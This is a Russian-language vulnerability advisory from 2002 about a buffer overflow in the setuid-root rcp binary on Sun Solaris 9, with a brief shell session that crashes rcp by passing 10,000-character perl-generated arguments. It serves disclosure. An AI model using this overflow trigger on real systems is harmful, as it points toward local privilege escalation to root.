Переполнение буфера в Sun Solaris
| Дата публикации: | 26.06.2002 |
| Всего просмотров: | 1179 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | В Sun Solaris обнаружено переполнение буфера в rcp. Локальное выполнение RPC с длинными параметрами командной строки (destination host name, и destination file name) может привести к ошибке сегментации. Так как rcp - setuid root, уязвимость может использоваться для поднятия привилегий. Уязвимость обнаружена в Sun Solaris 9.0 Пример: bash-2.05$ uname -a SunOS solaris9 5.9 Generic sun4u sparc SUNW,Ultra-5_10 bash-2.05$ ls -l /usr/sbin/static/rcp -r-sr-xr-x 1 root bin 787700 Apr 6 16:58 /usr/sbin/static/rcp bash-2.05$ /usr/sbin/static/rcp `perl -e 'print "A" x 10000'` `perl -e 'print "A" x 10000'`:`perl -e 'print "A" x 10000'` Segmentation Fault bash-2.05$ gdb bash: gdb: command not found bash-2.05$ |
| Ссылки: | solaris 9 sparc rcp |